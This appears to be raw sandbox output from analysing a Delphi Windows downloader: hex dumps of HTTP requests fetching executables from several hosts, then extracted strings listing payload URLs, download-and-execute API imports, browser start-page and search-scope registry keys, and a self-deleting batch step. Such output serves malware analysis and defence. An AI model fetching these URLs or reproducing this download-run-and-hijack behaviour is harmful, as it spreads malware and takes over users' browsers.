0x000000b0 (00176)   30373237 290d0a48 6f73743a 20636c69   0727)..Host: cli
0x000000c0 (00192)   636b2e74 336e6c69 6e6b2e63 6f6d0d0a   ck.t3nlink.com..
0x000000d0 (00208)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f732f51 6d594d5f 34355f31   GET /s/QmYM_45_1
0x00000010 (00016)   38393331 352e6578 65204854 54502f31   89315.exe HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   646c2e33 657a6a2e 636f6d0d 0a436f6e   dl.3ezj.com..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a69 6f6e3a20 4b656570   ive....ion: Keep
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f732f51 6d594d5f 34355f31   GET /s/QmYM_45_1
0x00000010 (00016)   38393331 352e6578 65204854 54502f31   89315.exe HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   646c2e33 657a6a2e 636f6d0d 0a436f6e   dl.3ezj.com..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a69 6f6e3a20 4b656570   ive....ion: Keep
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f732f51 6d594d5f 34355f31   GET /s/QmYM_45_1
0x00000010 (00016)   38393331 352e6578 65204854 54502f31   89315.exe HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   646c2e33 657a6a2e 636f6d0d 0a436f6e   dl.3ezj.com..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a69 6f6e3a20 4b656570   ive....ion: Keep
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f71756b 742f6269 6e642f2d   GET /qukt/bind/-
0x00000010 (00016)   32343038 5f315f71 6b742e65 78652048   2408_1_qkt.exe H
0x00000020 (00032)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000030 (00048)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000040 (00064)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000050 (00080)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000060 (00096)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000070 (00112)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000080 (00128)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000090 (00144)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000b0 (00176)   6f73743a 20716b74 2e6b7378 6279792e   ost: qkt.ksxbyy.
0x000000c0 (00192)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a70    Keep-Alive....p
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f71756b 742f6269 6e642f2d   GET /qukt/bind/-
0x00000010 (00016)   32343038 5f315f71 6b742e65 78652048   2408_1_qkt.exe H
0x00000020 (00032)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000030 (00048)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000040 (00064)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000050 (00080)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000060 (00096)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000070 (00112)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000080 (00128)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000090 (00144)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000b0 (00176)   6f73743a 20716b74 2e6b7378 6279792e   ost: qkt.ksxbyy.
0x000000c0 (00192)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a70    Keep-Alive....p
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f71756b 742f6269 6e642f2d   GET /qukt/bind/-
0x00000010 (00016)   32343038 5f315f71 6b742e65 78652048   2408_1_qkt.exe H
0x00000020 (00032)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000030 (00048)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000040 (00064)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000050 (00080)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000060 (00096)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000070 (00112)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000080 (00128)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000090 (00144)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000b0 (00176)   6f73743a 20716b74 2e6b7378 6279792e   ost: qkt.ksxbyy.
0x000000c0 (00192)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a70    Keep-Alive....p
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f747172 6c5f3839 5f313737   GET /tqrl_89_177
0x00000010 (00016)   3536302e 65786520 48545450 2f312e31   560.exe HTTP/1.1
0x00000020 (00032)   0d0a4163 63657074 3a202a2f 2a0d0a41   ..Accept: */*..A
0x00000030 (00048)   63636570 742d456e 636f6469 6e673a20   ccept-Encoding: 
0x00000040 (00064)   677a6970 2c206465 666c6174 650d0a55   gzip, deflate..U
0x00000050 (00080)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000060 (00096)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000070 (00112)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000080 (00128)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000090 (00144)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x000000a0 (00160)   35303732 37290d0a 486f7374 3a20646f   50727)..Host: do
0x000000b0 (00176)   776e2e74 69616e79 756e786a 2e636f6d   wn.tianyunxj.com
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000d0 (00208)   65702d41 6c697665 0d0a0d0a 0a0d0a70   ep-Alive.......p
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f747172 6c5f3839 5f313737   GET /tqrl_89_177
0x00000010 (00016)   3536302e 65786520 48545450 2f312e31   560.exe HTTP/1.1
0x00000020 (00032)   0d0a4163 63657074 3a202a2f 2a0d0a41   ..Accept: */*..A
0x00000030 (00048)   63636570 742d456e 636f6469 6e673a20   ccept-Encoding: 
0x00000040 (00064)   677a6970 2c206465 666c6174 650d0a55   gzip, deflate..U
0x00000050 (00080)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000060 (00096)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000070 (00112)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000080 (00128)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000090 (00144)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x000000a0 (00160)   35303732 37290d0a 486f7374 3a20646f   50727)..Host: do
0x000000b0 (00176)   776e2e74 69616e79 756e786a 2e636f6d   wn.tianyunxj.com
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000d0 (00208)   65702d41 6c697665 0d0a0d0a 0a0d0a70   ep-Alive.......p
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f747172 6c5f3839 5f313737   GET /tqrl_89_177
0x00000010 (00016)   3536302e 65786520 48545450 2f312e31   560.exe HTTP/1.1
0x00000020 (00032)   0d0a4163 63657074 3a202a2f 2a0d0a41   ..Accept: */*..A
0x00000030 (00048)   63636570 742d456e 636f6469 6e673a20   ccept-Encoding: 
0x00000040 (00064)   677a6970 2c206465 666c6174 650d0a55   gzip, deflate..U
0x00000050 (00080)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000060 (00096)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000070 (00112)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000080 (00128)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000090 (00144)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x000000a0 (00160)   35303732 37290d0a 486f7374 3a20646f   50727)..Host: do
0x000000b0 (00176)   776e2e74 69616e79 756e786a 2e636f6d   wn.tianyunxj.com
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000d0 (00208)   65702d41 6c697665 0d0a0d0a 0a0d0a70   ep-Alive.......p
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....


Strings
\
.

Abstract Error?Access violation at address %p in module '%s'. %s of address %p
A call to an OS function failed
Ancestor for '%s' not found
Application Error1Format '%s' invalid or incompatible with argument
April
Assertion failed
August	September
Cannot assign a %s to a %s
Cannot create file %s
Cannot open file %s$''%s'' is not a valid component name
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Control-C hit
December
Division by zero
DVCLAL
Error creating variant array
Error reading %s%s%s: %s
Exception in safecall method
External exception %x
Failed to get data for '%s'
Failed to set data for '%s'
February
File access denied
File not found
Floating point division by zero
Floating point overflow
Floating point underflow
Friday
Integer overflow Invalid floating point operation
Interface not supported
Invalid argument to time encode
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid filename
Invalid numeric input
Invalid pointer operation
Invalid property path
Invalid property value
Invalid variant operation"Variant method calls not supported
Invalid variant type conversion
I/O error %d
January
jjjj
July
June
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MAINICON(
March
Monday
No argument for format '%s'
November
October
Out of memory
PACKAGEINFO
Privileged instruction%Exception %s in module %s at %p.
Property is read-only
Property %s does not exist
Range check error
Read
Read beyond end of file	Disk full
Saturday
!'%s' is not a valid integer value
%s%s
%s.Seek not implemented$Operation not allowed on sorted list
%s (%s, line %d)
Stack overflow
Stream read error
Stream write error
Sunday
System Error.  Code: %d.
Thursday
Too many open files
Tuesday	Wednesday
Variant is not an array!Variant array index out of bounds
Write
                                                                
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
0 0$0(0,0004080<0@0P0`0d0t0
0 0$0(0,0:0_0f0
0"0&0*0.02060
"0&0,00050<0B0J0U0
!0%0)0-0105090=0A0E0I0M0Q0U0Y0]0a0e0i0m0q0u0
,00040
0&0.060>0F0W0b0j0r0z0
0(0@0L0\0|0
0)020Q0_0~0
0*070C0P0b0o0{0
-0105090=0A0E0I0M0Q0U0Y0]0a0e0i0m0q0
0%1)1:1
0 1$1(1@1L1P1l1t1x1|1
011q1}1
0123456789ABCDEF
0]1a1e1i1m1q1u1y1}1
; ;$;(;,;0;4;8;D;d;l;p;t;x;|;
>$>,>0>4>8><>@>D>H>L>`>
? ?$?(?,?0?4?8?<?@?D?H?L?P?
?$?,?0?4?8?<?@?D?H?L?P?
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
:,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?d?x?
=$=(=,=0=4=8=<=@=D=T=t=|=
< <$<(<,<0<4<D<d<l<p<t<x<|<
<$<(<0<4<<<@<H<L<T<X<`<d<l<p<x<|<
080@0D0H0L0P0T0X0\0`0t0
?0?8?<?@?D?H?L?P?T?X?h?
= =$=,=0=8=<=D=H=P=T=\=`=h=l=t=x=
;0<B<_<
>(?0?;?g?|?
0G2]2z2
=0=L=Q=%>
< <0<P<X<\<`<d<h<l<p<t<x<|<
0S0b0o0z0
1$121U1w1
1 121Z1^1b1z1
1,14181<1@1D1H1L1P1T1
1%1b1f1j1n1r1v1z1~1
1(1D1\1m1w1
1@1D1d1h1l1p1t1x1|1
1;1E1O1W1]1k1
1;1G1O1
1;1G1S1]1g1m1w1
1,1L1T1X1\1`1d1h1l1p1t1
1	2n2w2
1+2P2y2
142<2D2L2T2\2d2l2t2|2
; ;,;1; <G<x<
1R2k2}2
212?2F2^2e2x2
2$2<2@2
2 2$2(2,2@2`2h2l2p2t2x2|2
2"2*222:2B2J2R2Z2b2j2r2z2
2 2'2,222E2N2l2r2z2
2#2*242?2Q2b2o2{2
2&2.262>2F2N2V2^2f2n2v2~2
2 2/2t2y2
2$3+3G3
2&3:3N3
-2408_1_qkt.exe
2-4Y4a4i4q4y4
:";&;*;.;2;6;:;>;B;F;J;
292Q2n2}2
2C3O3V3`3j3
:2;C;T;i;m;q;u;y;};
3$3(3,3034383<3@3D3X3x3
3 3$3(3,3034383<3T3t3|3
3!3,373B3M3X3c3v3
3	3 3K3p3~3
3%3P3_3s3
3&3R3Z3b3j3r3z3
3>3V3z3
3/3Z3z3
3$4+4s5
?'?+?/?3?7?;?
?!?3?F?S?_?l?~?
=3=M=_=
3Messages
:~;3<w<
4(4044484<4@4D4H4L4P4`4
4$4,444<4D4L4T4\4k4w4
4,44484<4@4D4H4L4P4T4d4
4#4A4W4n4
454R4_4l4
4#5/565A5S5f5n5{5
4%5B5o5
:$:,:4:<:D:L:T:\:d:l:t:|:
4F4p4~4
;";4;T;\;`;d;h;l;p;t;x;|;
515I5S5Z5
545<5@5D5H5L5P5T5X5\5l5
5(5,5054585w6
5%5-53595@5J5
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
5,5>5K5W5d5v5~5
5!656h6
5#6r6{6
585@5D5H5L5P5T5X5\5`5
5F5a5p5
>*>5>?>J>T>_>i>s>y>
5M5R5}5
:!;5;[;o;
6#606H6
6 6$6(6,6064686<6
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
6&6.666>6F6N6V6^6f6n6v6~6
6'6,6O6^6
6(6H6P6T6X6\6`6d6h6l6p6t6x6|6
676C6K6
6+7:7H7
6M6j6J7!8(8L8~8
7.737c7
7%7/757<7F7K7Q7V7\7a7g7n7t7y7
7&7.767>7F7N7V7^7f7n7v7~7
7 7$7(7,7074787<7@7D7H7L7P7
7 7$7(7,7074787B7F7X7i7m7
7"7&7*7.72767
7$7B7>8
7,8084888<8@8D8H8L8P8T8
7*8:8S8c8
7+8`8y8}8
7(8_8z9
7A7J7Z7
7Project1
8(818:8C8H8
8$8,848<8D8L8T8\8d8l8t8|8
8,8=8A8T8i8
8&9:9B9X9p9~9
8;9A9Q9^9d9t9Z:a:.;5;
8(9b9}9=:
?$?.?8?B?L?V?h?
>.>8>B>L>V>`>r>
8Registry
9$9,949<9D9L9T9\9d9l9t9|9
9 9$9(9,9094989<9@9D9H9L9P9T9b9t9
:#:.:9:A:K:U:_:u:{:
:9:K:u:
9N9h9z9
>#>9>@>R>W>g>q>
advapi32.dll
:+;A;^;k;x;
apples_5_1008.exe
<B<K<}<
Boolean
CharNextA
Classes
^Classes
CloseHandle
CompareStringA
CreateDirectoryA
CreateEventA
CreateFileA
CreateMutexA
CreateProcessA
C<"u1S
CVariants
%.*ddi@
DefaultScope
del %0
DeleteCriticalSection
DeleteFileA
>(><>D>H>L>P>T>X>\>`>d>h>l>p>t>x>
DisplayName
EAbstractError
EAccessViolation
EAssertionFailed
EClassNotFound
EComponentErrort
	EControlC
EConvertError
EDivByZero
	EExternal
EExternalException
EFCreateError
EFilerErrorT
EFOpenError
EHeapException
EInOutError
	EIntError
EIntfCastError
EIntOverflow
EInvalidCast
EInvalidOp
EInvalidPointer
EListError
EMathError
EnterCriticalSection
EnumCalendarInfoA
EOSError
EOutOfMemory
	EOverflow
EPrivilege
ERangeErrorPn@
EReadError
ERegistryException
ESafecallException
EStackOverflow
EStreamError
EStringListError
EUnderflow
EVariantError
EWriteError
~ExC[)
	Exception
ExitProcess
EZeroDivide
<&<><F<
FileTimeToDosDateTime
FileTimeToLocalFileTime
FindClose
FindFirstFileA
FormatMessageA
FPUMaskValue
FreeLibrary
GetACP
GetCommandLineA
GetCPInfo
GetCurrentThreadId
GetDateFormatA
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetFileAttributesA
GetFileSize
GetFileType
GetKeyboardType
GetLastError
GetLocaleInfoA
GetLocalTime
GetLongPathNameA
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStringTypeExA
GetSystemMetrics
GetThreadLocale
GetTickCount
GetVersionExA
GetWindowsDirectoryA
GlobalAlloc
GlobalFree
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
;';-;G;N;X;b;l;x;
 goto try
=(=H=P=T=X=\=`=d=h=l=p=t=x=|=
;H<	="=P=x=
Ht3Ht[
Ht Ht.
http://114.215.104.141/hzsoft/IFoxInstall-y-c203945859-run-s-x.exe
http://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe
http://click.t3nlink.com/link/140896/setup_2948-140896.exe
http://dl.3ezj.com/s/QmYM_45_189315.exe
http://dls.oss-cn-hangzhou.aliyuncs.com/IFoxInstall-y-c203945859-run-s-x.exe
http://down.9vh.net/apples_5_1008.exe
http://down.chinashangrui.com/xxnz/xksd_50091167828.exe
http://down.tianyunxj.com/tqrl_89_177560.exe
http://qkt.ksxbyy.com/qukt/bind/-2408_1_qkt.exe
http://www.9365.info
http://www.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
?,?H?T?X?`?d?p?t?|?
hzsoft
hzsoft\-2408_1_qkt.exe
hzsoft\apples_5_1008.exe
hzsoft\IFoxInstall-y-c203945859-run-s-x.exe
hzsoft\QmYM_45_189315.exe
hzsoft\setup_2948-140896.exe
hzsoft\tqrl_89_177560.exe
hzsoft\xksd_50091167828.exe
.idata
if exist "
IFoxInstall-y-c203945859-run-s-x.exe
IInterface
INFNAN
IniFiles
InitializeCriticalSection
Int64Op
Integer
InterlockedDecrement
InterlockedIncrement
=i?q?z?
IStringsAdapter
; ;J;^;
kernel32.dll
KWindows
LeaveCriticalSection
LoadLibraryExA
LoadStringA
LocalAlloc
LocalFree
lstrcpynA
lstrlenA
m/d/yy
MessageBoxA
mmmm d, yyyy
:mm:ss
MultiByteToWideChar
nsgdrtw.bat
nsgdrtwnsgdrtwa
<#=O=}=
oleaut32.dll
.Owner
< <P<o<
P.reloc
Program Files\2345Explorer\Uninstall.exe
Program Files\Internet Explorer\iexplore.exe"
P.rsrc
= =p=w=
QmYM_45_189315.exe
QQQQQ3
QQQQQQ3
QQQQQQQSV
QQQQQQSVW3
QQQQQSVW
QQQQS3
QQQQSV
QTypInfo
Q<"u8S
R0Y0p0#1
RaiseException
.rdata
ReadFile
RealOp
RegCloseKey
RegCreateKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseMutex
ResetEvent
"RTLConsts
RtlUnwind
Runtime error     at 00000000
=)=S>`>
sActiveX
SafeArrayCreate
SafeArrayGetElement
SafeArrayGetLBound
SafeArrayGetUBound
SafeArrayPtrOfIndex
SafeArrayPutElement
SafeArrayRedim
Sd]_^[
SetEndOfFile
SetEvent
SetFilePointer
setup_2948-140896.exe
*ShellAPI
=+=:=S=n=
Software\Borland\Delphi\Locales
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
Software\Microsoft\Internet Explorer
Software\Microsoft\Internet explorer\Main
Software\Microsoft\Internet Explorer\SearchScopes
Software\Microsoft\Internet Explorer\SearchScopes\baidu
Start Page
StringP
Strings
S$_^[Y]
SysAllocStringLen
SysConst
SysFreeString
SysInit
SysReAllocStringLen
System
SysUtils
>S>Z>q>
<*t"<0r=<9w9i
TBoundArray
TCollection
TCollection0
TComponent
TComponentName
TCustomMemoryStream
TCustomVariantType
	TErrorRec
TExceptRec
TFiler
TFileStream|
THandleStream
This program must be run under Win32
t%HtIHtm
t@h`Z@
TInterfacedObject
TlsGetValue
TlsSetValue
TMemoryStream
$TMultiReadExclusiveWriteSynchronizer
TObject
TPersistent
TPersistent0
TPropFixup
TPropIntfFixup
tqrl_89_177560.exe
TReader
	TRegGroup
TRegGroups
	TRegistryS
TStream
TStringItem
TStringList
TStrings
TThreadList0
TThreadLocalCounter
TWriter
unersqa.exe
UnhandledExceptionFilter
unotcvb.exe
URLDownloadToFileA
UrlMon
URLMON.DLL
user32.dll
UTypes
>U?Y?]?a?e?i?m?q?u?y?}?
Variant
VariantChangeTypeEx
VariantClear
VariantCopy
VariantCopyInd
VariantInit
Variants
$VarUtils
Version
:<:V:f:k:
VirtualAlloc
VirtualFree
VirtualQuery
<	===W=
WaitForSingleObject
WideCharToMultiByte
WinExec
?WinInet
WinSock
WriteFile
X0_0q0u0y0}0
xksd_50091167828.exe
YStrUtils
_^[YY]
$YZ]_^[
YZ]_^[
YZXtm1
(Z]_^[
$Z]_^[
ZTUWVSPRTj